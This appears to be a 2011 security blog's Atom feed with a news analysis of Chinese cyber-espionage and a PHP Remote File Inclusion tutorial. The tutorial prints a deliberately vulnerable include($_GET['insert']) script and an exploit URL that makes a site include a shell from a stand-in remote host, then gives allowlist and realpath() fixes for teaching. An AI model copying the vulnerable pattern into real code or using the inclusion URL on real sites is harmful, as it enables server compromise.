<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;A04MRn47eCp7ImA9WhRaFEk.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693</id><updated>2012-02-17T03:39:47.000Z</updated><title>Sahara Security Blog</title><subtitle type="html">Get the latest news and in-depth analysis about IT security, including information about viruses and other malware, security patches, data protection and more ...</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://sahara-sec.blogspot.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>40</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/SaharaSecurityBlog" /><feedburner:info 
uri="saharasecurityblog" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry gd:etag="W/&quot;Dk8NSHc_eCp7ImA9WhRXGE4.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-3447614170249619293</id><published>2011-12-25T17:41:00.000Z</published><updated>2011-12-25T17:41:39.940Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-25T17:41:39.940Z</app:edited><title>Hidden Dragon: The Chinese cyber menace !</title><content type="html">
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Q-jNWhQnd2c9DatLS3pFk1qgouc/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Q-jNWhQnd2c9DatLS3pFk1qgouc/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Q-jNWhQnd2c9DatLS3pFk1qgouc/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Q-jNWhQnd2c9DatLS3pFk1qgouc/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;strong class="trailer"&gt;Analysis&lt;/strong&gt; Cybercrooks and patriotic 
state-backed hackers in China are collaborating to create an even more 
potent security threat, according to researchers.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-pUDayZrQwac/TvdgK22vyGI/AAAAAAAAAEQ/LBIOF5kgIaw/s1600/cyberattack_1805164c.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="199" src="http://1.bp.blogspot.com/-pUDayZrQwac/TvdgK22vyGI/AAAAAAAAAEQ/LBIOF5kgIaw/s320/cyberattack_1805164c.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;


Profit-motivated crooks are trading compromised access to foreign 
governments' computers, which they are unable to monetise, for exploits 
with state-sponsored hackers. This trade is facilitated by information 
broker middlemen, according to Moustafa Mahmoud, president of The Middle 
East Tiger Team.&lt;br /&gt;
&lt;br /&gt;


&lt;div id="article-mpu-container"&gt;

&lt;div class="ad-now" id="ad-mpu1-spot" style="height: auto; width: auto;"&gt;



&lt;/div&gt;
Mahmoud has made an extensive study of the Chinese digital 
underground that partially draws on material not available to the 
general public, such as books published by the US Army's Foreign 
Military Studies Office, to compile a history of hacking in China. His 
work goes a long way to explain the threat of cyber-espionage from China
 that has bubbled up towards the top of the political agenda over recent
 months.&lt;br /&gt;

&lt;/div&gt;
The first Chinese hacking group was founded in 1997 but disbanded in 
2000 after a financial row between some of its principal players led to a
 lawsuit. At its peak the organisation had about 3,000 members, 
according to Mahmoud. The motives of this so-called Red Hacker group 
were patriotic, defending motherland China against its enemies.&lt;br /&gt;
&lt;br /&gt;


The hacking of the US Embassy and the White House over the accidental 
bombing of the Chinese Embassy in Belgrade back in 1999 brought many 
flag-waving Chinese hackers together to, as they saw it, defend the 
honour of the motherland and fight imperialism in cyberspace.&lt;br /&gt;
&lt;br /&gt;


This role was taken over by the Honker Union of China (HUC) after 
2000, and the HUC later became the mainstay of the Red Hacker Alliance. 
China’s so-called “red hackers” attack critics of the state and 
infiltrate foreign government and corporate sites – among other 
activities. The phenomenon of patriotic hackers is far from restricted 
to China and also exists in Russia, for example. Russian hackers tend to
 make greater use of defacement and botnets to silence critics rather 
than spying.&lt;br /&gt;


&lt;h3&gt;
Enter the Dragon&lt;/h3&gt;
Over more recent years, different groups – involved in cybercrime to 
make money rather than in patriotic hacking – have emerged in China, 
some of them affiliated with the Triads. These groups run so-called 
bulletproof hosting operations, providing services to phishing fraudsters 
and the like and ignoring the takedown notices that ethical ISPs would 
comply with, as well as various botnet-powered scams, spam and paid-for 
DDoS attacks for hire. "These firms did not target Chinese firms and were 
therefore not prosecuted," Mahmoud explained.&lt;br /&gt;
&lt;br /&gt;


Over the years patriotic hacker groups and criminal hackers have 
forged alliances, a process facilitated by the Chinese government and in
 particular the Peoples' Liberation Army, according to Mahmoud. One 
landmark event in this process was the defacement of Western targets and
 similar cyber-attacks following the downing of a Chinese jet by US 
warplanes in 2001. These attacks promptly ceased after they were 
denounced by the &lt;i&gt;People's Daily&lt;/i&gt;, the organ of the ruling Communist Party.&lt;br /&gt;
&lt;br /&gt;


The Chinese government began to see the potential of cyberspace at 
around this time and established a PLA hacking corps, as Mahmoud 
described it, featuring hand-picked soldiers who showed talent for 
cyber-security.&lt;br /&gt;
&lt;br /&gt;


Mahmoud said that despite the existence of this corps the Chinese 
often prefer to use "freelance hackers" for "plausible deniability". "We
 can talk about hackers but it's better to talk about businessmen 
selling secrets. An entire underground industry has grown up to support 
cybercrime," he said.&lt;br /&gt;
&lt;br /&gt;


There are various roles within such group including malware 
distribution, bot master, account brokers and "most importantly 
vulnerability researchers, whose collective ingenuity has been applied 
to run attacks against Western targets and to develop proprietary 
next-generation hacking tools", according to Mahmoud.&lt;br /&gt;


Small groups, including the Network Crack Program Hacker (NCPH), that
 research gaping security holes and develop sophisticated malware 
strains are reportedly sponsored by the PLA.&lt;br /&gt;
&lt;br /&gt;


Western governments, hi-tech firms, oil exploration outfits and 
military targets have variously been targeted in an expanding series of 
so-called Advanced Persistent Threat (APT) cyber-attacks, commonly 
featuring Trojan backdoors, over the years. These operations have been 
known as TitanRain, ShadyRAT and Night Dragon, among others.&lt;br /&gt;
&lt;br /&gt;


"It's sometimes difficult to differentiate between state-sponsored 
and industrial espionage attacks but what's striking is that all these 
attacks happen between 9am and 5pm Chinese time," Mahmoud noted.&lt;br /&gt;
&lt;br /&gt;


Gaining access to industrial secrets is part of a deliberate, targeted government plan, &lt;a href="http://www.most.gov.cn/eng/programmes1/200610/t20061009_36225.htm" target="_blank"&gt;Programme 863&lt;/a&gt;, 
whose aim is to make Chinese industry financially independent 
of foreign technology. It also has a military dimension. "China sees 
cyberspace as a way of compensating for its deficiency in conventional 
warfare, for example by developing strategies to cripple communication 
networks," Mahmoud said. "That does not mean China wants to fight. 
Inspired by the ideas of Sun Tzu [author of The Art of War], China 
regards it as a superior strategy to break the enemy without having to 
fight."&lt;br /&gt;
&lt;br /&gt;


North Korea is also developing expertise in cyber-warfare, running &lt;a href="http://www.dailynk.com/english/read.php?cataId=nk02900&amp;amp;num=7656" target="_blank"&gt;training schools&lt;/a&gt; that resemble those run in China. However there is little or no collaboration between the two countries, according to Mahmoud.&lt;br /&gt;


"The Chinese see their expertise in cyberspace as an edge they are 
not willing to share. That's why there is no collaboration with hackers 
outside the country."&lt;br /&gt;
&lt;br /&gt;


The &lt;i&gt;Wall Street Journal&lt;/i&gt; &lt;a href="http://online.wsj.com/article_email/SB10001424052970204336104577094690893528130-lMyQjAxMTAxMDEwMjExNDIyWj.html" target="_blank"&gt;reported&lt;/a&gt;
 last Tuesday that US authorities have managed to trace several 
high-profile hacking attacks, including assaults against RSA Security 
and defence contractor Lockheed Martin, back to China. Information 
obtained during an attack on systems behind RSA's SecurID tokens was 
later used in a failed attack against Lockheed Martin.&lt;br /&gt;
&lt;br /&gt;


"US intelligence officials can identify different groups based on a variety of indicators," the &lt;i&gt;WSJ&lt;/i&gt;
 reports. "Those characteristics include the type of cyberattack 
software they use, different internet addresses they employ when 
stealing data, and how attacks are carried out against different 
targets. In addition to US government agencies, major targets of these 
groups include US defence contractors."&lt;br /&gt;
&lt;br /&gt;


US investigators working for the National Security Agency have 
reportedly identified twenty groups of hackers, a dozen of which have 
links to China's People's Liberation Army. Others are affiliated to 
Chinese universities. In total, several hundred people are said to be 
involved in the attacks, some of whom have been individually identified.
 The information has helped to strengthen the US's hand in diplomatic 
negotiations with China.&lt;br /&gt;
&lt;br /&gt;


The data also provides a list of targets for possible counter-attacks.&lt;br /&gt;


Bloomberg &lt;a href="http://www.bloomberg.com/news/2011-12-13/china-based-hacking-of-760-companies-reflects-undeclared-global-cyber-war.html" target="_blank"&gt;reports&lt;/a&gt;
 in a similar vein that China is engaged in an undeclared cyber Cold War
 against Western targets with the goal (unlike the Soviet-era Cold War) 
of stealing intellectual property rather than destabilising regimes or 
fostering communism.&lt;br /&gt;
&lt;br /&gt;


Targets have ranged from tech giants such as Google and Intel to iBahn, 
selected because it supplies Wi-Fi technology to hotels frequented by 
Western execs, oil exploration biz bosses, and government and defence 
contractors. Chinese hackers stand accused of stealing anything and 
everything that isn't nailed down from as many as 760 different 
corporations over recent years, resulting in losses of intellectual 
property valued in the billions.&lt;br /&gt;
&lt;div id="body"&gt;


&lt;h3&gt;
Paper tiger, hidden Trojan&lt;/h3&gt;
Recent reports have painted a conflicting picture of Chinese cyber-warfare capabilities. A recent report [&lt;a href="http://www.ncix.gov/publications/reports/fecie_all/Foreign_Economic_Collection_2011.pdf" target="_blank"&gt;PDF&lt;/a&gt;]
 by The Office of the National Counterintelligence Executive (ONCIX), 
which was presented to Congress, named and shamed China and Russia for 
running cyber-espionage campaigns geared towards stealing the US's 
technology and economic secrets. The report, straightforwardly titled &lt;em&gt;Foreign Spies Stealing US Economic Secrets in Cyberspace&lt;/em&gt;, described China as the source of the majority of intrusions without blaming its government directly.&lt;br /&gt;
&lt;br /&gt;


&lt;div id="article-mpu-container"&gt;

&lt;div class="ad-now" id="ad-mpu1-spot" style="height: auto; width: auto;"&gt;



&lt;/div&gt;
Some observers suggest that the US intelligence community has decided to publicly finger China and Russia over cyber-espionage only after diplomatic efforts failed to yield a result.&lt;br /&gt;
&lt;br /&gt;

&lt;/div&gt;
China routinely and angrily denies any involvement in 
cyber-espionage, arguing that it is frequently victimised by these types
 of attacks itself, and most recently said that it wanted to help 
improve cyber-security defences across all nations.&lt;br /&gt;
&lt;br /&gt;


Regardless of what's happening elsewhere we've frequently heard 
praise for the staffers of China's computer emergency response centres. 
Over several years various businesses and teams in the country have been
 more pro-active and helpful in working with organisations, such as 
Spamhaus, in dealing with spam.&lt;br /&gt;
&lt;br /&gt;


However evidence showing that Chinese denials over the use of hacking
 tools ought not to be taken at face value emerged unexpectedly earlier 
this year. An extract from a propaganda film illustrated the use of 
custom tools to hack websites run by the banned spiritual movement Falun
 Gong. The video named the PLA's Electrical Engineering University as 
the source of the utility.&lt;br /&gt;
&lt;br /&gt;


Security experts who have visited China praise its universities. HD 
Moore, the developer of Metasploit and chief security officer at Rapid7,
 said: "They are focused on defending China and malware research."&lt;br /&gt;
&lt;br /&gt;


Moore, who toured computer science departments in universities in 
Beijing and elsewhere, found students frequently had an aptitude for 
malware analysis, and saw the potential for work in this area. However 
those with expertise in exploit development were "few and far between", 
he said. "Not that many people in China are doing penetration testing 
work either," he added.&lt;br /&gt;
&lt;br /&gt;


A &lt;a href="http://www.securitychallenges.org.au/ArticlePDFs/vol7no2Ball.pdf" target="_blank"&gt;recent report&lt;/a&gt;
 by the Australian National University concludes that China's 
cyber-warfare capabilities, at least, are actually mediocre at best. 
Desmond Ball, a professor at the Australian National University, argues 
China's offensive capabilities are limited. Local internet systems are 
notable for their deficiencies and vulnerabilities, he adds.&lt;br /&gt;
&lt;br /&gt;


Information security experts, particularly those with an intelligence background, remain wary of China's capabilities.&lt;br /&gt;


Prescott Winter, chief technology officer for the public sector at HP
 ArcSight and former NSA associate deputy director of national 
intelligence for information integration, said that China remains a 
major threat.&lt;br /&gt;


"China is a major player in cyber-espionage. It has a 
well-constructed underground economy that is targeting intellectual 
property. Western governments are also at the front line," he said, 
adding that hackers often cause collateral damage when they access and 
ransack targeted networks.&lt;br /&gt;
&lt;br /&gt;


Other former intelligence officials argue that the focus on China 
hides the greater truth that everyone is engaged in cyber-espionage.&lt;br /&gt;
&lt;br /&gt;


"Every country (especially China, Russia, and even our allies), 
engages in industrial espionage against the United States and each 
other," &lt;a href="https://community.rapid7.com/community/infosec/blog/2011/11/11/is-cyber-espionage-cheating" target="_blank"&gt;writes&lt;/a&gt; Marcus Carey, who worked for the NSA for eight years before joining Rapid7 as a security researcher and community manager.&lt;br /&gt;
&lt;br /&gt;


"For these countries, cyber-espionage is likely just the tip of the 
iceberg, very much complementing the main areas of espionage being 
conducted in the physical world," he said. "It’s much cheaper for 
foreign governments to 'borrow' research and development information and
 go straight into production, particularly in countries like China and 
India where there is a strong supply of industrial low-wage workers to 
crank out products. For this and other reasons, espionage is certainly 
not a new practice, rather the internet has simply made it more visible 
and traceable."&lt;br /&gt;
&lt;br /&gt;


"The truth is, a good espionage program is vital to a country's 
success, as we saw during WWII and the Cold War. It is the 
responsibility of governing agencies to perform espionage against other 
countries, as well as helping their own citizens with counter-espionage 
and cyber defense strategies," he added.&lt;br /&gt;


Carey, paraphrasing baseball legend Mark Grace on cheating, concludes
 "countries that aren't engaging in espionage aren't trying hard 
enough!" ®&lt;br /&gt;


&lt;h3&gt;
Hacknote&lt;/h3&gt;
&lt;i&gt;Dexter&lt;/i&gt; fans may like to know that the Chinese characters for hacker transliterate to Dark Visitor. A &lt;a href="http://www.thedarkvisitor.com/" target="_blank"&gt;blog&lt;/a&gt; of the same name is one of the best online resources keeping hype-free tabs on the Chinese cybercrime scene.&lt;br /&gt;

&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-3447614170249619293?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/biO0PHucDeI" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/3447614170249619293/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/12/hidden-dragon-chinese-cyber-menace.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/3447614170249619293?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/3447614170249619293?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/biO0PHucDeI/hidden-dragon-chinese-cyber-menace.html" title="Hidden Dragon: The Chinese cyber menace !" 
/><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-pUDayZrQwac/TvdgK22vyGI/AAAAAAAAAEQ/LBIOF5kgIaw/s72-c/cyberattack_1805164c.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/12/hidden-dragon-chinese-cyber-menace.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEcDRns7fip7ImA9WhRXFko.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-4744953028543934488</id><published>2011-12-23T20:14:00.001Z</published><updated>2011-12-23T21:34:37.506Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-23T21:34:37.506Z</app:edited><title>Security : Fixing RFI Vulnerability !!</title><content type="html">
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/uLu0R2lvwgeqR1zRvP1wUw6JVso/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/uLu0R2lvwgeqR1zRvP1wUw6JVso/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/uLu0R2lvwgeqR1zRvP1wUw6JVso/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/uLu0R2lvwgeqR1zRvP1wUw6JVso/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="color: blue;"&gt;&lt;/span&gt;Hello !&lt;br /&gt;
&lt;br /&gt;
I was wondering why most &lt;b&gt;webmasters&lt;/b&gt; don't fix the vulnerabilities on their websites, yet still complain about hackers. Perhaps they don't know how; but why run a website if you don't know, and why not learn?&lt;br /&gt;
&lt;br /&gt;
So I wrote this article to help you learn one way of fixing a vulnerability on your own website without needing anyone else. Today's vulnerability is &lt;b style="font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;"&gt;RFI&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
A lot of you will ask: &lt;b&gt;what is RFI&lt;/b&gt;?&lt;br /&gt;
&lt;br /&gt;
&lt;b style="font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;"&gt;Answer &lt;/b&gt;: RFI is an abbreviation of " &lt;b&gt;R&lt;/b&gt;emote &lt;b&gt;F&lt;/b&gt;ile &lt;b&gt;I&lt;/b&gt;nclusion ", it's a Vulnerability or Security Error that allowed others (Hackers &amp;amp; Crackers) to include a file (mostly Shell File) to your website in order to hack it of course.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;"&gt;Question &lt;/b&gt;: How will they include file in my website without even uploading it ?!!&lt;br /&gt;
&lt;br /&gt;
&lt;b style="font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;"&gt;Answer &lt;/b&gt;: too easy !, most of RFI Vulnerability will appear like this :&lt;br /&gt;
&lt;div style="color: black;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="color: black;"&gt;
&lt;/div&gt;
&lt;pre class="alt2" dir="ltr" style="border: 1px inset; color: #cc0000; height: 146px; margin: 0px; overflow: auto; padding: 3px; text-align: left; width: 400px;"&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 146px; margin: 0px; overflow: auto; padding: 3px; text-align: left; width: 400px;"&gt;&lt;span style="color: #38761d;"&gt;&amp;lt;?php&lt;/span&gt;
&lt;span style="color: blue;"&gt;// coded by Tahar ZoFix for training porposes&lt;/span&gt;
if(empty($_GET['insert'])){
echo "Please Choose a File";
} else {
include($_GET['insert']);
}
&lt;span style="color: #38761d;"&gt;?&amp;gt;&lt;/span&gt;&lt;/pre&gt;
&lt;/pre&gt;
&lt;br /&gt;
&lt;br /&gt;
And in the URL :&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;www.yourwebsite.com/xxxx.php?yyyy=File&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
with: &lt;b&gt;xxxx = the name of the script (here: view.php)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;yyyy = the name of the parameter (here: insert)&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Now, to exploit this error, an attacker requests this:&lt;br /&gt;
&lt;br /&gt;
www.yourwebsite.com/xxxx.php?yyyy=http://target.com/shell.txt?&lt;br /&gt;
&lt;br /&gt;
where &lt;b&gt;http://target.com/shell.txt?&lt;/b&gt; is where the attacker has uploaded the shell. It is served as a &lt;b&gt;TXT&lt;/b&gt; file (really important) so that the server hosting it hands out the raw PHP source instead of running it; your server then runs that source when it is included. The trailing '&lt;b&gt;?&lt;/b&gt;' (also really important) turns anything the vulnerable script appends to the parameter, such as a '.php' suffix, into part of the query string sent to the attacker's server rather than part of the file name. Note that include() only fetches URLs at all when allow_url_include is On in php.ini; it is Off by default, which is your first line of defence.&lt;br /&gt;
&lt;br /&gt;
So now, to fix it, you have to make sure that the file being included is one of your own files on your server, and never a URL or a path outside the directory you intend. To do that:&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: black;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;code style="white-space: nowrap;"&gt;&lt;/code&gt;&lt;br /&gt;
&lt;table border="1"&gt;
  &lt;tbody&gt;
&lt;tr&gt;
   &lt;td&gt;&lt;code style="white-space: nowrap;"&gt;&lt;span style="color: black;"&gt;
   &lt;span style="color: #0000bb;"&gt;&amp;lt;?php&lt;br /&gt;
   &lt;/span&gt;&lt;span style="color: #ff8000;"&gt;//&amp;nbsp;coded&amp;nbsp;by Tahar ZoFix for&amp;nbsp;training&amp;nbsp;porposes&lt;br /&gt;
   &lt;/span&gt;&lt;span style="color: #007700;"&gt;if(empty(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;$_GET&lt;/span&gt;&lt;span style="color: #007700;"&gt;[&lt;/span&gt;&lt;span style="color: #dd0000;"&gt;'insert'&lt;/span&gt;&lt;span style="color: #007700;"&gt;])){&lt;br /&gt;
   echo&amp;nbsp;&lt;/span&gt;&lt;span style="color: #dd0000;"&gt;"Please Choose a File"&lt;/span&gt;&lt;span style="color: #007700;"&gt;;&lt;br /&gt;
   }&amp;nbsp;else&amp;nbsp;{&lt;br /&gt;
   include(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;getcwd&lt;/span&gt;&lt;span style="color: #007700;"&gt;()&amp;nbsp;.&amp;nbsp;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;$_GET&lt;/span&gt;&lt;span style="color: #007700;"&gt;[&lt;/span&gt;&lt;span style="color: #dd0000;"&gt;'insert'&lt;/span&gt;&lt;span style="color: #007700;"&gt;]);&lt;br /&gt;
   }&lt;br /&gt;
   &lt;/span&gt;&lt;span style="color: #0000bb;"&gt;?&amp;gt;&lt;/span&gt; &lt;/span&gt;&lt;/code&gt;&lt;/td&gt;
  &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;code style="white-space: nowrap;"&gt;
&lt;code&gt;&lt;span style="color: black;"&gt;
&lt;span style="color: #0000bb;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;&lt;/span&gt;
&lt;/span&gt;
&lt;/code&gt;&lt;/code&gt;&lt;br /&gt;
Pinning the include to a directory on your own server stops the http://... trick, because the path now starts with a local directory instead of a URL, so the RFI is gone. Be careful, though: simply gluing a directory in front of the raw parameter does not stop '../' traversal, so an attacker could still ask for ../../etc/passwd and read local files (a local file inclusion, LFI). Strip directory components from the parameter or, better still, only accept names from a fixed allowlist, and keep allow_url_include switched off in php.ini (it is Off by default).&lt;br /&gt;
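Here is a fuller version of the fix, added to this article as an example and not the original post's code. It keeps the "insert" parameter from the snippets above but assumes the includable pages live in a pages/ directory next to the script and are limited to the hypothetical names home, about and contact. It combines an allowlist with a realpath() containment check, so a bad request is rejected before any file is touched:&lt;br /&gt;

```php
&amp;lt;?php
// Added example for this article, not code from the original post.
// Assumes the includable pages live in a pages/ directory next to this
// script and that the request parameter is still called "insert".
declare(strict_types=1);

// The only page names the script will ever include (hypothetical names).
// Anything else is rejected before a single filesystem call is made.
const ALLOWED_PAGES = ['home', 'about', 'contact'];

/**
 * Map a user-supplied page name to an absolute, verified path, or null.
 *
 * Two independent checks: the name must be on the allowlist, and the
 * resolved path must still lie inside $baseDir after realpath() has
 * collapsed any "..", symlinks and stream wrappers. The first check alone
 * stops http://attacker/shell.txt; the second also stops ../../etc/passwd
 * if the allowlist is ever loosened to accept free-form names.
 */
function resolve_page(string $name, string $baseDir): ?string
{
    if (!in_array($name, ALLOWED_PAGES, true)) {
        return null;                              // not on the allowlist
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null;                              // directory or file missing
    }
    // The resolved file must sit strictly under the resolved base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;                              // escaped pages/
    }
    return $path;
}

$raw  = $_GET['insert'] ?? '';
$name = is_string($raw) ? $raw : '';             // ?insert[]=x arrives as an array
if ($name === '') {
    echo "Please choose a page";
} elseif (($file = resolve_page($name, __DIR__ . '/pages')) === null) {
    http_response_code(404);
    echo "Unknown page";
} else {
    include $file;
}
```

Try it with ?insert=about (included), then with ?insert=../../etc/passwd and ?insert=http://target.com/shell.txt? (both rejected by the allowlist before realpath() is even called). The allowlist is what makes the script safe even if allow_url_include is ever turned on; the realpath() check is the belt to that pair of braces, and it is what you keep if the list of pages has to come from somewhere else, such as a directory listing.&lt;br /&gt;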
&lt;br /&gt;
To keep the article short and understandable, I skipped some steps that are not really important and do not change its content.&lt;br /&gt;
&lt;br /&gt;
I hope you find it easy to understand; if you have any requests, do not hesitate to contact me :).&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;b&gt;Lesson By; &lt;span style="color: #990000;"&gt;Tahar ZoFix&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;b style="color: #0b5394;"&gt;Sahara Security Blog&lt;/b&gt;.&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-4744953028543934488?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/8_Jz_LmSkJQ" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/4744953028543934488/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/12/security-fixing-rfi-vulnerability.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/4744953028543934488?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/4744953028543934488?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/8_Jz_LmSkJQ/security-fixing-rfi-vulnerability.html" title="Security : Fixing RFI Vulnerability !!" 
/><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/12/security-fixing-rfi-vulnerability.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkAAQnw7fCp7ImA9WhRXFUU.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-3420710006379124785</id><published>2011-12-22T21:19:00.000Z</published><updated>2011-12-22T21:19:03.204Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-22T21:19:03.204Z</app:edited><title>Clever patching keeps the system serviceable !</title><content type="html">
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Rm4GghTpFsZFEGlfYCxKsqSQjMU/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Rm4GghTpFsZFEGlfYCxKsqSQjMU/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Rm4GghTpFsZFEGlfYCxKsqSQjMU/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Rm4GghTpFsZFEGlfYCxKsqSQjMU/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
It was the kind of day most systems administrators would like to 
forget. A customer of Canadian security consultant David Lewis, founder 
of the Liquidmatrix Security Digest, had decided to roll out a software 
patch to a Symantec product.&lt;br /&gt;
